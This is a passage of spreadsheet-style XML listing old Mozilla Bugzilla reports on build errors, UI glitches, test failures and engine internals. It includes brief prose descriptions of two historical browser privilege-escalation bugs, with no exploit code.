    <t>Reporting/Charting</t>
  </si>
  <si>
    <t>For new products the charting error message The tool which gathers bug counts has not been run yet is misleading</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0)
Build Identifier: Bugzilla 2.18
I have created a schedule task Collectstats.pl. After that old chart was 
not displaying internal error. But as I create a new product and then run this 
scheduled task. After that open the Old Chart and select old products name 
in Product and click Continue it is not displaying any error. but if I 
select new product's name in Product option and click Continue it is 
displaying error message The tool which gathers bug counts has not been run 
yet.
Reproducible: Always
Steps to Reproduce:
1.Create new product.
2.Run the scheduled task collectstats.pl
3.Open the Old Chart and select new product name in Product and 
click Continue.
Actual Results:  
URL: http://bugzilla:81/reports.cgi?product=Shinsat&amp;datasets=NEW%
3A&amp;datasets=ASSIGNED%3A&amp;datasets=REOPENED%3A&amp;datasets=UNCONFIRMED%3A
Displaying Internal error The tool which gathers bug counts has not been run 
yet.
Expected Results:  
Shouldn't displayed any error. And should displayed graph with latest data.</t>
  </si>
  <si>
    <t>wurblzap</t>
  </si>
  <si>
    <t>mkumar</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-295659</t>
  </si>
  <si>
    <t>WebDAV</t>
  </si>
  <si>
    <t>static builds with webdav fail</t>
  </si>
  <si>
    <t>WebDAV isn't adding itself to the static module list so builds fail with:
00:12  nsStaticComponents.obj : error LNK2001: unresolved external
                  symbol struct nsModuleInfo nsWebDAVModules_gModuleInfo
                  (?nsWebDAVModules_gModuleInfo@@3UnsModuleInfo@@A)
And right now I can't find the list that it needs to add itself to.  Something
modules/staticmod related? Maybe?</t>
  </si>
  <si>
    <t>shaver</t>
  </si>
  <si>
    <t>CORE-507485</t>
  </si>
  <si>
    <t>Character range matching code is potentially dodgy</t>
  </si>
  <si>
    <t>See bug 332173 comment 69.  This applies only to mozilla-central's code not to any release branches.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-456195</t>
  </si>
  <si>
    <t>Tabbing no longer works in the bookmark manager</t>
  </si>
  <si>
    <t>When the bookmark manager is shown or dismissed we need to swap it in and out with the Gecko view in the tab chain.</t>
  </si>
  <si>
    <t>murph</t>
  </si>
  <si>
    <t>stuart.morgan+bugzilla</t>
  </si>
  <si>
    <t>TESTING-790787</t>
  </si>
  <si>
    <t>Marionette</t>
  </si>
  <si>
    <t>TESTING</t>
  </si>
  <si>
    <t>Enable all relevant marionette unit tests for B2G</t>
  </si>
  <si>
    <t>looking at mozilla-central/testing/marionette/client/marionette/tests/unit/unit-tests.ini there are lot of tests that are marked b2g = false when they shouldn't be. We should be running these tests in the B2G environment. 
If you enable these tests and once bug 775116 lands then you'll see these errors when the chrome tests run:
E/GeckoConsole(   42): [JavaScript Error: not well-formed {file: chrome://marionette/content/test_nested_iframe.xul line: 10 column: 2 source: }]
even though these tests pass in the Firefox environments.
If you disable the chrome tests (by using skip_if_b2g decorator) and only run the content tests then you'll see 2 new test failures:
======================================================================
FAIL: test_execute_permission (test_execute_async_script.TestExecuteAsyncContent)
----------------------------------------------------------------------
Traceback (most recent call last):
  File /home/b2g/Code/mozilla-b2g-emu/gecko/testing/marionette/client/marionette/tests/unit/test_execute_async_script.py line 73 in test_execute_permission
    )
AssertionError: JavascriptException not raised
======================================================================
FAIL: test_execute_permission (test_execute_script.TestExecuteContent)
----------------------------------------------------------------------
Traceback (most recent call last):
  File /home/b2g/Code/mozilla-b2g-emu/gecko/testing/marionette/client/marionette/tests/unit/test_execute_script.py line 28 in test_execute_permission
    )
AssertionError: JavascriptException not raised
I'm not sure how this is related yet so I'm raising this bug to enable these tests and track down the cause of these failures</t>
  </si>
  <si>
    <t>jgriffin</t>
  </si>
  <si>
    <t>malini</t>
  </si>
  <si>
    <t>FIREFOX-539134</t>
  </si>
  <si>
    <t>Bookmarks completely empty no folders shown</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.2) Gecko/20100105 Firefox/3.6 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.2) Gecko/20100105 Firefox/3.6 (.NET CLR 3.5.30729)
Ever since 3.6b5 my bookmarks have shown as completely empty. The bookmarks menu only has the items 'Bookmark this Page' to 'Organize Bookmarks'. The bookmarks toolbar is empty. Attempting to add a bookmark shows no 'Bookmark Toolbar' 'Bookmark Menu' or any of my folders. The drop-down address box does not show history or bookmarks.
However if I manually type in the address of a bookmarked page the star in the address box turns gold.
Reproducible: Always
Steps to Reproduce:
1. Add a bookmark.
2. Look.
3. Notice that it's not there.
Actual Results:  
It wasn't there.
Expected Results:  
It would be there.
I am set onto permanent 'private browsing' mode. It doesn't work even if I enter normal browsing.</t>
  </si>
  <si>
    <t>qaz1024</t>
  </si>
  <si>
    <t>CORE-560466</t>
  </si>
  <si>
    <t>Arbitrary code execution using userdata handlers</t>
  </si>
  <si>
    <t>Since we call userdata handlers without dealing with JS context stuff if a
chrome code manipulates a content node and a userdata handler is called the
userdata handler's scripted caller is the chrome code.
When viewPartialSourceForSelection() calls ancestorContainer.cloneNode()
content can run arbitrary code with chrome privileges.</t>
  </si>
  <si>
    <t>moz_bug_r_a4</t>
  </si>
  <si>
    <t>FIREFOX-283966</t>
  </si>
  <si>
    <t>No new Mac nightlies Just an empty DMG file since 20050226</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050226 Firefox/1.0+ (PowerBook)
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050226 Firefox/1.0+ (PowerBook)
The last created Mac nightly is firefox-1.0+.en-US.mac.dmg from 25-Feb-2005.
Since 26-Feb-2005 there's a big (26MB) but empty file called
rw.firefox-1.0+.en-US.mac.dmg in the latest-trunk folder.
Workaround: Use nightlies provided by Powerbook at http://homepage.mac.com/krmathis/
Reproducible: Always
Steps to Reproduce:
1. Visit http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/
2.
3.
Actual Results:  
No current firefox-1.0+.en-US.mac.dmg
Expected Results:  
A current firefox-1.0+.en-US.mac.dmg that's not 26MB</t>
  </si>
  <si>
    <t>chase</t>
  </si>
  <si>
    <t>kamikazow</t>
  </si>
  <si>
    <t>CORE-529119</t>
  </si>
  <si>
    <t>Funky behavior with XUL error pages</t>
  </si>
  <si>
    <t>There is some funky behavior going on recently with XUL error pages.  'Try Again' button loads the previous page you were on and the back button on the navigation bar seems to pick a random spot in the history to load.
STR:
1) Load http://www.google.com in a new tab
2) Go to http://www.23456789iuybh87g.com
3) Hit the 'Try Again' button google loads
4) Repeat steps 1-2
5) Hit the back button on the navigation bar and some random page from the history loads and not google
Regressed between 20091110 and 20091111
Pushlog for that range: http://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=f4ef40336cc6&amp;tochange=2eb351cc47d3</t>
  </si>
  <si>
    <t>honzab.moz</t>
  </si>
  <si>
    <t>u88484</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-672393</t>
  </si>
  <si>
    <t>QA Companion marked incompatible for Firefox versions higher than 6.*.</t>
  </si>
  <si>
    <t>If you go to https://addons.mozilla.org/en-US/firefox/addon/mozilla-qa-companion/ you will see that the QA Companion is only compatible with up to Firefox 6.*. Since we're working on 7 and 8 now we should bump up the version number for compatibility unless it really does not work.</t>
  </si>
  <si>
    <t>abillings</t>
  </si>
  <si>
    <t>CORE-328745</t>
  </si>
  <si>
    <t>toSource: unnecessary sharp variables</t>
  </si>
  <si>
    <t>Consider the following code for js shell:
var x = [] x.foo = x
var y = {} y.f = function() { } y.f.bar = y.f
print(uneval(x))
print(uneval(y))
Currently it prints:
#1=[]
({f:#1=(function () {})})
where #1 is a leftover from the fact that toSource for Object and Array consider that all enumeratable properties from the object graph would be serialized. See MarkSharpObjects from jsobj.c But this is not the case when toSource does not include all the properties as above example demonstrates.
It would be nice if unnecessary sharp variables would be avoided.</t>
  </si>
  <si>
    <t>CORE-130767</t>
  </si>
  <si>
    <t>table content computed differently than div content.</t>
  </si>
  <si>
    <t>tables has set:
border-style: none
padding: 0
margin: 0
width: 100%
div has set:
nothing that should affect this
sometimes the table and div line up (ie have the save width) sometimes they
don't.  (if I up'ed my resolution they lined up fine.)  I'm guessing there's a
floating point involved here someplace that is behaving differently between the
two (this is the only thing I can think of besides my code being invalid but
I'm pretty sure my code is right).</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-453219</t>
  </si>
  <si>
    <t>Verbatim</t>
  </si>
  <si>
    <t>Merge /images/ and /img/</t>
  </si>
  <si>
    <t>The new design is using /img/.  Just a bug to remind myself to merge these two.</t>
  </si>
  <si>
    <t>CORE-397210</t>
  </si>
  <si>
    <t>Storing JSTokenStream in JSParseContext</t>
  </si>
  <si>
    <t>Created attachment 281974
v1
[This is a spin-off of bug 394941 comment 5]
As the patch from bug 394941 comment 2 shows it is desirable to store JSTokenStream* inside JSParseContext. Yet JSTokenStream already contains a pointer to JSParseContext. Thus instead of using cross-referenced JSTokenStream and JSParseContext I suggest to put JSTokenStream into JSParseContext as a field.
The attached patch implements this idea in the following way:
1. The patch removes JSTokenStream dependency on a pointer to JSParseContext. The pointer was necessary only to call js_NewParsedObjectBox for a regex in the scanner. With the patch the scanner delegates the creation of regex objects to the parser. For clarity the patch also renames TOK_OBJECT into TOK_REGEXP.
2. The new code no longer allocates JSTokenStream using JSContext.tempPool and replaces 3 js_New*TokenStream functions via single InitTokenStream. It allowed to put JSTokenStream directly into JSParserContext as a field. That in turn allowed to remove filename/principals fields from JSCodeGenerator since they just contained copies of the values stored in JSTokenStream.
3. The patch changes various js_Compile*/js_Parse* functions to take JSParseContext and rename js_CompileTokenStream into js_CompileScript for summetry with js_CompileFunctionBody.
The patch does not put JSContext* into JSParseContext to minimize the amount of changes delegating that and other potential cleanups to another bug.</t>
  </si>
  <si>
    <t>CORE-503950</t>
  </si>
  <si>
    <t>OS/2 bustage fix for bug503377</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.1) Gecko/20090621 Firefox/3.5
Build Identifier: 
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp: In function 'void* PluginWndProc(HWND ULONG void* void*)':
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp:182: error: no matching function for call to 'nsIPluginInstance::GetMIMEType(char**)'
../../../../dist/include/nsIPluginInstance.h:181: note: candidates are: virtual nsresult nsIPluginInstance::GetMIMEType(const char**) 
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp: In member function 'nsresult nsPluginNativeWindowOS2::SubclassAndAssociateWindow()':
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp:325: warning: ISO C++ forbids casting between pointer-to-function and pointer-to-object
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp:333: warning: unused variable 'win'
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp: In member function 'nsresult nsPluginNativeWindowOS2::UndoSubclassAndAssociateWindow()':
E:/usr/src/hg/mozilla-central/modules/plugin/base/src/nsPluginNativeWindowOS2.cpp:355: warning: ISO C++ forbids casting between pointer-to-function and pointer-to-object
make.exe[5]: *** [nsPluginNativeWindowOS2.o] Error 1
after checkin for bug503377
Reproducible: Always</t>
  </si>
  <si>
    <t>wuno</t>
  </si>
  <si>
    <t>CORE-777260</t>
  </si>
  <si>
    <t>Text not rendered in  until switching tabs or otherwise re-rendering the window</t>
  </si>
  <si>
    <t>Created attachment 645676
screencast showing the misplaced autocompletion dropdown and text rendering issues
(Sorry if that's not the right component.)
We use the provided URL to comment on bugs that have been merged and this bug has been around for quite some time but I always forgot to file it.
STR:
1) Open http://www.graememcc.co.uk/m-cmerge/?cset=ef20925bc2a5
2) Click the Next button in the upper right
3) Scroll to the bottom and click Submit the changes above
4) Press a key to enter a value into the Username field.
Now there's not even text showing up in the input field. If you entered your credentials before the autocompletion popup will be misplaced and positioned in the lower right.
If you enter text or select an entry from the autocompletion dropdown it's first rendered when switching to a different tab and back to the current one or doing a similar action.
I attached a screencast of this issue. I checked with (I think) RyanVM on IRC and he experiences the same issue so it's not only me :)</t>
  </si>
  <si>
    <t>SEAMONKEY-108295</t>
  </si>
  <si>
    <t>I have a bookmark file that will crash mozilla on solaris and linux.  It was generated by mozilla too.</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/4.76 [en] (X11 U Linux 2.2.19 i686 Nav)
BuildID:    2001101201
This bookmark file was initially imported from Netscape 4.79 on linux.  It
worked fine in mozilla for weeks but then one day it simply stopped.  I tried
to copy it to my solaris machine and mozilla has the same problem on an Ultra
60 w/Solaris 2.7.  The problem isn't a core-dump instant crash it just makes
CPU and memory thrashing for hours (never stops either).  SIMPLE FIX remove
this bookmarks file and mozilla works fine.  Trying to import it has the same
effect.
Reproducible: Always
Steps to Reproduce:
1.  get my bookmarks file by emailing me c@cera.ws
2.
3.
Actual Results:  it hangs forever.
email me c@cera.ws and I'll send you my file.  I don't want to just post it on
the net.</t>
  </si>
  <si>
    <t>cera</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-340886</t>
  </si>
  <si>
    <t>Junk status changes to unknown when I delete or separate an attachment</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 de rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Thunderbird Version 1.5.0.4 (20060516)
When deleting or separating an attachment from an incoming mail the junk status of this mail always changes from no junk (or junk) to unknown (it shows the red question mark). 
Reproducible: Always
Steps to Reproduce:
1. You get mail which is automatically or manually marked as junk (j) or no junk (shift+j)
2. Now delete or separate an attachment from this mail
Actual Results:  
You'll see the junk status will change to unknown
Expected Results:  
Thunderbird shouldn't forget the junk status of a mail.
This is Thunderbird Version 1.5.0.4 with the Mnenhy 0.7.4 extension installed but I don't think that Mnenhy is responsable for this behaviour.</t>
  </si>
  <si>
    <t>rkent</t>
  </si>
  <si>
    <t>gabriela</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-415540</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD</t>
  </si>
  <si>
    <t>Incorrect behavior for Array.push</t>
  </si>
  <si>
    <t>Posting on the newsgroup by Matthieu Riou:
Hi
I think I've found a small bug in the Array.function shortcut (instead
of Array.prototype.function.call(...)). Here is the testcase:
js&gt; var Constr = function() {}
js&gt; Constr.prototype = []
js&gt; c = new Constr()
js&gt; c.push(1)
1
js&gt; c.push(2)
2
js&gt; Array.push(c3)
4
js&gt; c
12
Let me know if you'd like me to file a Bugzilla issue. With a few
pointers I don't mind looking into it but it's probably going to be
quicker for you to fix it anyway :)
Thanks
Matthieu</t>
  </si>
  <si>
    <t>norrisboyd</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-446428</t>
  </si>
  <si>
    <t>Nickname adjustments made to connect (e.g add _) are kept when reconnecting</t>
  </si>
  <si>
    <t>Basically the problem is that the nickname used when connecting is not reset so it keeps all the underscores or alternate nickname that was needed when connecting even if the preferred nickname was subsequently reclaimed.
For example:
  1. Connect as Silver.
  2. Silver is taken so automatically tries Silver_ which is free.
  3. Original Silver pings out and reclaim code changes to it from Silver_.
  4. Disconnect and reconnect.
  5. Initial nickname used is Silver_ but should have been Silver.</t>
  </si>
  <si>
    <t>bugzilla-mozilla-20000923</t>
  </si>
  <si>
    <t>CORE-419452</t>
  </si>
  <si>
    <t>loadOverlay fails to fire observer when overlay is overlaid</t>
  </si>
  <si>
    <t>If the overlay loaded document.loadOverlay itself has an overlay either via a PI or via the chrome registry then the overlay load observer never fires.
Note that this is not quite the same as bug 330458 as I am not trying to call document.loadOverlay before the previous overlay has loaded.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-300609</t>
  </si>
  <si>
    <t xml:space="preserve">wrong result of index() function when hit  inside </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8b2) Gecko/20050706 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.2 en-US rv:1.8b2) Gecko/20050706 Firefox/1.0+
index() function not works properly when used in trigger with
appearance=minimal inside repeat construction. It always return '1'.
Reproducible: Always
Steps to Reproduce:
1. Open attached sample in browser.
2. Hit on button 2 and close dialog box
3. Hit on label 2 and close dialog box
Actual Results:  
First dialog box show 2 and second dialog box show 1
Expected Results:  
Both dialog box should show 2
I use Mozilla XForms 0.2</t>
  </si>
  <si>
    <t>spsh</t>
  </si>
  <si>
    <t>CORE-822804</t>
  </si>
  <si>
    <t>Graphics</t>
  </si>
  <si>
    <t>GfxDriverInfo.h:156: warning: comparison between signed and unsigned integer expressions</t>
  </si>
  <si>
    <t>Just hit these build warnings while building B2G:
{
In file included from gecko/widget/xpwidgets/GfxDriverInfo.cpp:7:
gecko/widget/xpwidgets/GfxDriverInfo.h: In function 'bool mozilla::widget::SplitDriverVersion(const char* char* char* char* char*)':
gecko/widget/xpwidgets/GfxDriverInfo.h:156: warning: comparison between signed and unsigned integer expressions
gecko/widget/xpwidgets/GfxDriverInfo.h:179: warning: comparison between signed and unsigned integer expressions
}
This is for the variable int destIdx which is initialized to 0 and then incremented from there (and never modified in any other way).  Looks like it can just be an unsigned variable.</t>
  </si>
  <si>
    <t>dholbert</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-338710</t>
  </si>
  <si>
    <t>Some mode responses not shown in output window</t>
  </si>
  <si>
    <t>When an Unreal server sets channel modes due to flooding it uses the server name as the source. I've no idea if this is allowed per the spec or not but we should probably handle it.
+ set (string) 'channel'
+ type (string) 'chanmode'
+ destObject (undefined) undefined
+ destMethod (string) 'onChanMode'
+ hooks (object)
+ data (string) ':sand.mozilla.org MODE #foobar +i'
+ queuedAt (object)
+ level (number) 5
+ currentObject (object)
+ source (string) 'sand.mozilla.org'
+ ignored (boolean) false
+ server (object)
+ params (object)
+ decodeParam (function) 7 lines
+ code (string) 'MODE'
+ channel (object)
+ modeStr (string) '+i'
+ usersAffected (object)
*</t>
  </si>
  <si>
    <t>rdmsoft</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-458761</t>
  </si>
  <si>
    <t>sm-labs-mac01 needs a kick</t>
  </si>
  <si>
    <t>Summary says it all kick sm-labs-mac01 thanks.</t>
  </si>
  <si>
    <t>CORE-411092</t>
  </si>
  <si>
    <t>XPConnect</t>
  </si>
  <si>
    <t>XPCNativeWrapper pollution using setTimeout()</t>
  </si>
  <si>
    <t>A script that setTimeout(code) creates inherits its scripted caller's script
filename.  Thus it's possible to use setTimeout() in the same way as bug
369211 and bug 387881 to modify XPCNativeWrappers.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-286673</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/access/samples/dhtml-checkbox.xhtml</t>
  </si>
  <si>
    <t>The dhtml-checkbox page actually has an .html extension instead of an .xhtml
extension.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-138473</t>
  </si>
  <si>
    <t>ritlabs.com - No download file type asking...</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.0rc1)
Gecko/20020417
BuildID:    2002041711
When downloading unkown file types (unkown extensions) mozilla always open them
without an question dialog as text/plain
In the url above i try to download .bav file types and my mozilla RC1.0 open
them in the browser window as plain text (
Reproducible: Always
Steps to Reproduce:
downloading )
Actual Results:  dont work
Expected Results:  a Window opening and ask me what mozilla should do.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-180806</t>
  </si>
  <si>
    <t>Networking: IMAP</t>
  </si>
  <si>
    <t>IMAP backend should avoid unnecessary logout</t>
  </si>
  <si>
    <t>I'm not perfectly sure what I propose is a good idea.
Suppose you are connecting to a server using IMAP/SSL.
Suppose your configuration is to use client authentication with the server
where the authentication happens on the SSL layer around the connection.
Suppose when the user opens the connection the prompt comes up that asks the
user to enter the password to unlock self's certificate for authentication.
Suppose the user decides to cancel.
In the above scenario when the user quits the application one can see the mail
code is attempting another connection to the server on exit.
This happens because the imap protocol code is trying to send a
 1 logout
command which agains triggers the attempt to establish a crypto communication.
I want to suggest we prevent sending the logout command on closing if it would
be the first command to the server.</t>
  </si>
  <si>
    <t>kaie</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-107681</t>
  </si>
  <si>
    <t>duats.com - isindex to .shtml gets sent to *.html instead[from sub]</t>
  </si>
  <si>
    <t>With Mozilla 0.9.5 under Linux an isindex field that should be directed to
file.shtml gets sent to file.html instead.
This functionality works OK under netscape 4.77.
To reproduce:
Go to page http://www.duats.com/actypesearch.html
Enter cessna in the form field press enter.
That will send a request to http://www.duats.com/actypesearch.html?cessna
whereas the request should have been sent to
http://www.duats.com/actypesearch.shtml?cessna
The proper result would have been a page giving a bunch of aircraft
type abbreviations.  The actual result is to see the original page with
the form again.
The page's isindex line is:
&lt;isindex action=actypesearch.shtml prompt=Single word to search
for:&gt;</t>
  </si>
  <si>
    <t>ml+moz</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-489155</t>
  </si>
  <si>
    <t>Put video file on videos.mozilla.org</t>
  </si>
  <si>
    <t>Please put this video file:
http://labs.silverorange.com/files/mozilla-videos/en.mp4
In this dir:
http://videos.mozilla.org/firefox3/screencast1/</t>
  </si>
  <si>
    <t>oremj</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-415624</t>
  </si>
  <si>
    <t>new ssh key</t>
  </si>
  <si>
    <t>Created attachment 301334
public RSA key
hey 
could you please attach the attached ssh key to my ldap account?  
thanks
alex</t>
  </si>
  <si>
    <t>CORE-2540</t>
  </si>
  <si>
    <t>Can't build current CVS Tree (21.1.99) Getting internal compiler error</t>
  </si>
  <si>
    <t>On Linux 2.0.36 gcc and g++ 2.7.2.3 gtk 1.1.13 nspr with pthreads mozilla
with pthreads the build dies in
nsDocLoader.cpp with In method
nsDocLoaderServiceFactory::~nsDocLoaderServiceFactory()
line 1869 Internal compiler error
Template problem?</t>
  </si>
  <si>
    <t>scullin</t>
  </si>
  <si>
    <t>andreas.otte</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-124332</t>
  </si>
  <si>
    <t>Error Console</t>
  </si>
  <si>
    <t>JavaScript Console should use fixed width font</t>
  </si>
  <si>
    <t>The JavaScript Console uses a variable with font.  This means that features like
the green arrow which underlines the point in a line with the JS fails is hard
to match up.
Switching to a fixed with font would make the green arrow appear under the point
in the line with the JS fails just making the feature useful.</t>
  </si>
  <si>
    <t>CORE-373295</t>
  </si>
  <si>
    <t>min width computation broken for text split between two text nodes when first is continuation</t>
  </si>
  <si>
    <t>I found this bug by making dynamic changes to layout/reftests/bugs/351641-1a.html.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-443001</t>
  </si>
  <si>
    <t>Tracing Virtual Machine</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD</t>
  </si>
  <si>
    <t>String concatenation results in extensive recursion</t>
  </si>
  <si>
    <t>The implementation of String::collectTree is highly recursive. Running the ecma3/Array/e15_4_2_1_2.as testcase recurses into collectTree to a depth of 2043. This is exacerbated by an apparent problem in string concatenation that fails to save the tree depth. String::concatStrings() calls String::getDepth() to test if the string should be flattened but String::setDepth() is never called.</t>
  </si>
  <si>
    <t>daumling</t>
  </si>
  <si>
    <t>rob.borcic</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-237981</t>
  </si>
  <si>
    <t>esbe.se - JavaScript scrollbar does not work</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. goto 
   you will see a Javascript or DOM or I do not know what one 
   scrollbar at the right in the frame
2. move the scroll-slider in the page up anddown by mousepointer also
   try to move the slider by clicking on the spearheads at the ends of the 
   scroll slider
   expected: scroll
   actual: nothing happens
Works fine with IE6 decision required whether this scroll mode should be
supported by mozilla.
Please find a better component!
Rainer</t>
  </si>
  <si>
    <t>RainerBielefeldNG</t>
  </si>
  <si>
    <t>CORE-416813</t>
  </si>
  <si>
    <t>jslock.c does not link on VC7.1 due to use of _InterlockedCompareExchange</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-235638</t>
  </si>
  <si>
    <t>Web Developer</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD</t>
  </si>
  <si>
    <t>wrong url for PyXPCOM project</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040113
PyXPCOM project links to XPCOM instead of to PyXPCOM.
need to adjust line 146 (?) as follows:
-        PyXPCOM
+        &lt;a
href=http://www.mozilla.org/catalog/architecture/xpcom/pyxpcom/&gt;PyXPCOM
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>rjkeller</t>
  </si>
  <si>
    <t>CORE-511728</t>
  </si>
  <si>
    <t>Misc. cleanup from bug 503080</t>
  </si>
  <si>
    <t>* I promised if I ever got through bug 506491 alive I would add a few asserts. Here they are.
* The patch for bug 503080 regressed js_DumpObject here's the fix.
* Since we know Block objects have slots for all the let-variables by the time PutBlockObject has been called there's really no need for block_{getset}Property to call JS_{GetSet}ReservedSlot. They can just read the slot directly.  Happily this change does not conflict with Igor's patch in bug 511425.
* In fact I don't think block_{getset}Property can be called except with tinyids so tighten the runtime check for JSVAL_IS_INT(idval) to an assertion.
* Give js_BlockClass the stub JSClass.{getset}Property hooks. Instead when defining a property of a Block put the special block_{getset}Property getter and setter on it. No change in behavior but I think it's better to avoid using the JSClass-wide hooks when possible.</t>
  </si>
  <si>
    <t>BUGZILLA-342113</t>
  </si>
  <si>
    <t>Allow custom fields to appear as a discrete field in the search form</t>
  </si>
  <si>
    <t>Custom fields are listed in the Fields drop-down menu of the boolean charts but they don't appear as a discrete field in the search form as other fields do.  They should appear there as well.</t>
  </si>
  <si>
    <t>altlist</t>
  </si>
  <si>
    <t>FIREFOX-494905</t>
  </si>
  <si>
    <t>Address Bar</t>
  </si>
  <si>
    <t>mochitest-browser-chrome: new browser_bug304198.js intermittently fails</t>
  </si>
  <si>
    <t>{
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox/1243348533.1243353640.3398.gz
Linux mozilla-central unit test on 2009/05/26 07:35:33
TEST-UNEXPECTED-FAIL | chrome://mochikit/content/browser/browser/base/content/test/browser_bug304198.js | gURLBar.value should be testPartialURL (just set) - Got http://example.org/browser/browser/base/content/test/dummy_page.html expected http://example.org/browser/browser/base/content/test/dummy_page
TEST-UNEXPECTED-FAIL | chrome://mochikit/content/browser/browser/base/content/test/browser_bug304198.js | gURLBar.value should be  (just set) - Got http://example.org/browser/browser/base/content/test/dummy_page.html expected
TEST-UNEXPECTED-FAIL | chrome://mochikit/content/browser/browser/base/content/test/browser_bug304198.js | gURLBar.value should be testPartialURL after switching back to partialURLTab - Got http://example.org/browser/browser/base/content/test/dummy_page.html expected http://example.org/browser/browser/base/content/test/dummy_page
TEST-UNEXPECTED-FAIL | chrome://mochikit/content/browser/browser/base/content/test/browser_bug304198.js | gURLBar.value should be  after switching back to deletedURLTab - Got http://example.org/browser/browser/base/content/test/dummy_page.html expected
}</t>
  </si>
  <si>
    <t>gavin.sharp</t>
  </si>
  <si>
    <t>bugzillamozillaorg_serge_20140323</t>
  </si>
  <si>
    <t>BUGZILLA-161356</t>
  </si>
  <si>
    <t>mention additional perl module</t>
  </si>
  <si>
    <t>for my suse 7.1 linux I had to install
   perl -MCPAN -e 'install File::Temp'
before I could do
   perl -MCPAN -e 'install Template'
(the dependency wasn't picked up automatically.
So you might want to add File::Temp to the list of modules on that page.
Cheers!
Andy</t>
  </si>
  <si>
    <t>bz</t>
  </si>
  <si>
    <t>astenger</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-149575</t>
  </si>
  <si>
    <t>bcdef.com - uses document.all</t>
  </si>
  <si>
    <t>Philip Winston's Elastic Trail script (entertaining on Netscape 4.79)
fails to amuse on Mozilla 1.0</t>
  </si>
  <si>
    <t>rmp</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-512984</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD</t>
  </si>
  <si>
    <t>Windows CE build bots should build with --enable-tests</t>
  </si>
  <si>
    <t>We got tests working (finally) a month or so ago and I don't want to see that regress.</t>
  </si>
  <si>
    <t>lassey</t>
  </si>
  <si>
    <t>BUGZILLA-108581</t>
  </si>
  <si>
    <t>Installation &amp; Upgrading</t>
  </si>
  <si>
    <t>Bundle::Bugzilla needs to be updated on CPAN for the Bugzilla v2.16 release</t>
  </si>
  <si>
    <t>CPAN::Bugzilla will need to be updated with the new modules
and new versions of modules listed in checksetup.pl before or
coinciding with the Bugzilla v2.16 release.</t>
  </si>
  <si>
    <t>ddkilzer</t>
  </si>
  <si>
    <t>CORE-503160</t>
  </si>
  <si>
    <t>integer constants are not automatically demoted</t>
  </si>
  <si>
    <t>shows up in some peacekeeper benchmarks</t>
  </si>
  <si>
    <t>CORE-309532</t>
  </si>
  <si>
    <t>nsObjectFrame should not be a container frame</t>
  </si>
  <si>
    <t>We can fix this once we fix bug 309521</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-494747</t>
  </si>
  <si>
    <t>Try Server</t>
  </si>
  <si>
